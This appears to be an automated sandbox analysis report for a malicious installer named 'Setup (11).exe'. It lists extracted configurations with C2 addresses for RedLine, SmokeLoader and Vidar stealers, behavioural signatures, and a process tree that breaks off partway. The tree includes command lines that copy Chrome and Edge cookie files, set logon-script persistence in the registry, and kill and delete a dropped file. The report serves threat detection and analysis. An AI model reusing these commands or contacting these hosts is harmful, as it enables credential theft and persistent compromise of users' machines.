Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    682s
  • max time network
    840s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (11).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 10 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 18 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 11 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 22 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 37 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 62 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1344
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1296
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Themes
        1⤵
          PID:1136
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1764
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
            1⤵
              PID:1096
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2460
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                  PID:2424
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:932
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                    2⤵
                      PID:7008
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1004
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Browser
                      1⤵
                      • Suspicious use of SetThreadContext
                      PID:2768
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                        2⤵
                        • Drops file in System32 directory
                        • Checks processor information in registry
                        • Modifies data under HKEY_USERS
                        • Modifies registry class
                        PID:5780
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                      1⤵
                        PID:2688
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                        1⤵
                          PID:2660
                        • C:\Users\Admin\AppData\Local\Temp\Setup (11).exe
                          "C:\Users\Admin\AppData\Local\Temp\Setup (11).exe"
                          1⤵
                          • Checks computer location settings
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:796
                          • C:\Users\Admin\Documents\JA1wnKyOWUzD4njKQE_zMsBb.exe
                            "C:\Users\Admin\Documents\JA1wnKyOWUzD4njKQE_zMsBb.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2308
                          • C:\Users\Admin\Documents\0H9HIEe70kYyJuDF_hGBr9Kt.exe
                            "C:\Users\Admin\Documents\0H9HIEe70kYyJuDF_hGBr9Kt.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2276
                          • C:\Users\Admin\Documents\c2hjqGxJQVzz77H_p_jftAk5.exe
                            "C:\Users\Admin\Documents\c2hjqGxJQVzz77H_p_jftAk5.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:664
                          • C:\Users\Admin\Documents\Xx29Cyi7xlhMWd1uiXRnIy58.exe
                            "C:\Users\Admin\Documents\Xx29Cyi7xlhMWd1uiXRnIy58.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:3476
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 660
                              3⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4992
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 676
                              3⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4544
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 724
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4644
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 632
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4192
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1132
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2180
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1152
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4800
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1196
                              3⤵
                              • Program crash
                              PID:4356
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 3476 -s 1264
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1780
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /im "Xx29Cyi7xlhMWd1uiXRnIy58.exe" /f & erase "C:\Users\Admin\Documents\Xx29Cyi7xlhMWd1uiXRnIy58.exe" & exit
                              3⤵
                                PID:4168
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im "Xx29Cyi7xlhMWd1uiXRnIy58.exe" /f
                                  4⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3424
                            • C:\Users\Admin\Documents\Mk8QLlt4T4PBXgY3GA0TLY5G.exe
                              "C:\Users\Admin\Documents\Mk8QLlt4T4PBXgY3GA0TLY5G.exe"
                              2⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              PID:3872
                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                3⤵
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                • Drops file in Program Files directory
                                PID:4984
                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:4948
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  4⤵
                                    PID:4356
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4616
                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:5036
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:2116
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:4020
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5496
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    4⤵
                                    • Executes dropped EXE
                                    PID:5720
                                  • C:\Windows\system32\WerFault.exe
                                    C:\Windows\system32\WerFault.exe -u -p 5036 -s 1552
                                    4⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    PID:5144
                              • C:\Users\Admin\Documents\xEcZv4_U0iA9RdRTt0u_tMdi.exe
                                "C:\Users\Admin\Documents\xEcZv4_U0iA9RdRTt0u_tMdi.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:360
                              • C:\Users\Admin\Documents\VcHkVk99fIItdYZFaVd9KC9p.exe
                                "C:\Users\Admin\Documents\VcHkVk99fIItdYZFaVd9KC9p.exe"
                                2⤵
                                  PID:3908
                                  • C:\Users\Admin\Documents\VcHkVk99fIItdYZFaVd9KC9p.exe
                                    "C:\Users\Admin\Documents\VcHkVk99fIItdYZFaVd9KC9p.exe" -q
                                    3⤵
                                    • Executes dropped EXE
                                    PID:4924
                                • C:\Users\Admin\Documents\Drvo2u293_CEMarOwCmi9f_T.exe
                                  "C:\Users\Admin\Documents\Drvo2u293_CEMarOwCmi9f_T.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1660
                                • C:\Users\Admin\Documents\cInUeQlRVKh6xIkvJGb_XHS8.exe
                                  "C:\Users\Admin\Documents\cInUeQlRVKh6xIkvJGb_XHS8.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  PID:3968
                                • C:\Users\Admin\Documents\Yvv1ErJnoIcxjB7OxLrQSFpE.exe
                                  "C:\Users\Admin\Documents\Yvv1ErJnoIcxjB7OxLrQSFpE.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:4108
                                  • C:\Users\Admin\AppData\Local\Temp\is-4OS38.tmp\Yvv1ErJnoIcxjB7OxLrQSFpE.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-4OS38.tmp\Yvv1ErJnoIcxjB7OxLrQSFpE.tmp" /SL5="$2026A,138429,56832,C:\Users\Admin\Documents\Yvv1ErJnoIcxjB7OxLrQSFpE.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of FindShellTrayWindow
                                    PID:4336
                                    • C:\Users\Admin\AppData\Local\Temp\is-D7L71.tmp\Setup.exe
                                      "C:\Users\Admin\AppData\Local\Temp\is-D7L71.tmp\Setup.exe" /Verysilent
                                      4⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      PID:4368
                                      • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                        "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:3908
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 760
                                          6⤵
                                          • Program crash
                                          PID:6512
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 784
                                          6⤵
                                          • Program crash
                                          PID:7156
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 732
                                          6⤵
                                          • Program crash
                                          PID:5388
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 824
                                          6⤵
                                          • Program crash
                                          PID:3192
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 1068
                                          6⤵
                                          • Program crash
                                          PID:4540
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 1108
                                          6⤵
                                          • Program crash
                                          PID:5316
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 1028
                                          6⤵
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4304
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 1108
                                          6⤵
                                          • Program crash
                                          PID:5316
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 1220
                                          6⤵
                                          • Program crash
                                          PID:6076
                                      • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                        5⤵
                                        • Executes dropped EXE
                                        PID:3964
                                        • C:\Users\Admin\AppData\Local\Temp\is-I7EN0.tmp\Inlog.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-I7EN0.tmp\Inlog.tmp" /SL5="$102DE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of FindShellTrayWindow
                                          PID:4484
                                          • C:\Users\Admin\AppData\Local\Temp\is-4H5JR.tmp\Setup.exe
                                            "C:\Users\Admin\AppData\Local\Temp\is-4H5JR.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                            7⤵
                                              PID:6244
                                              • C:\Users\Admin\AppData\Local\Temp\is-5QQCB.tmp\Setup.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-5QQCB.tmp\Setup.tmp" /SL5="$204AC,17368975,721408,C:\Users\Admin\AppData\Local\Temp\is-4H5JR.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                8⤵
                                                • Loads dropped DLL
                                                • Drops file in Program Files directory
                                                • Suspicious use of FindShellTrayWindow
                                                PID:4404
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-28128.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                  9⤵
                                                    PID:6796
                                                    • C:\Windows\SysWOW64\expand.exe
                                                      expand C:\Users\Admin\AppData\Local\Temp\is-28128.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                      10⤵
                                                      • Drops file in Windows directory
                                                      PID:5388
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                    9⤵
                                                      PID:4968
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                        10⤵
                                                          PID:4884
                                                      • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                        9⤵
                                                        • Loads dropped DLL
                                                        PID:8280
                                                      • C:\Users\Admin\AppData\Local\Temp\is-28128.tmp\{app}\vdi_compiler.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-28128.tmp\{app}\vdi_compiler"
                                                        9⤵
                                                          PID:8944
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-28128.tmp\{app}\vdi_compiler.exe"
                                                            10⤵
                                                            • Blocklisted process makes network request
                                                            PID:6668
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping localhost -n 4
                                                              11⤵
                                                              • Runs ping.exe
                                                              PID:1704
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                          9⤵
                                                          • Checks computer location settings
                                                          PID:4660
                                                • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Enumerates connected drives
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:4356
                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629281727 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                    6⤵
                                                      PID:9212
                                                  • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                    "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                    5⤵
                                                      PID:4816
                                                      • C:\Users\Admin\AppData\Local\Temp\is-DCVDR.tmp\WEATHER Manager.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-DCVDR.tmp\WEATHER Manager.tmp" /SL5="$102E8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of FindShellTrayWindow
                                                        PID:5148
                                                        • C:\Users\Admin\AppData\Local\Temp\is-D0U61.tmp\Setup.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\is-D0U61.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                          7⤵
                                                          • Loads dropped DLL
                                                          • Enumerates connected drives
                                                          • Modifies system certificate store
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:6280
                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-D0U61.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-D0U61.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629281727 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                            8⤵
                                                              PID:7716
                                                      • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:4696
                                                        • C:\Users\Admin\AppData\Local\Temp\is-MKBO6.tmp\VPN.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-MKBO6.tmp\VPN.tmp" /SL5="$102F4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:5224
                                                          • C:\Users\Admin\AppData\Local\Temp\is-4JQS7.tmp\Setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-4JQS7.tmp\Setup.exe" /silent /subid=720
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:4816
                                                            • C:\Users\Admin\AppData\Local\Temp\is-6T94I.tmp\Setup.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-6T94I.tmp\Setup.tmp" /SL5="$204AA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-4JQS7.tmp\Setup.exe" /silent /subid=720
                                                              8⤵
                                                              • Loads dropped DLL
                                                              • Drops file in Program Files directory
                                                              • Modifies system certificate store
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:6776
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                9⤵
                                                                  PID:8364
                                                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                    tapinstall.exe remove tap0901
                                                                    10⤵
                                                                    • Checks SCSI registry key(s)
                                                                    PID:9020
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                  9⤵
                                                                    PID:8636
                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                      tapinstall.exe install OemVista.inf tap0901
                                                                      10⤵
                                                                        PID:2872
                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                      9⤵
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:6576
                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                      9⤵
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:8956
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Checks whether UAC is enabled
                                                              • Drops file in Program Files directory
                                                              PID:2496
                                                            • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                              "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:5300
                                                              • C:\Users\Admin\AppData\Local\Temp\tmp4D0E_tmp.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\tmp4D0E_tmp.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:5200
                                                                • C:\Windows\SysWOW64\dllhost.exe
                                                                  "C:\Windows\System32\dllhost.exe"
                                                                  7⤵
                                                                    PID:5936
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                    7⤵
                                                                      PID:3372
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd
                                                                        8⤵
                                                                        • Blocklisted process makes network request
                                                                        PID:3476
                                                                        • C:\Windows\SysWOW64\findstr.exe
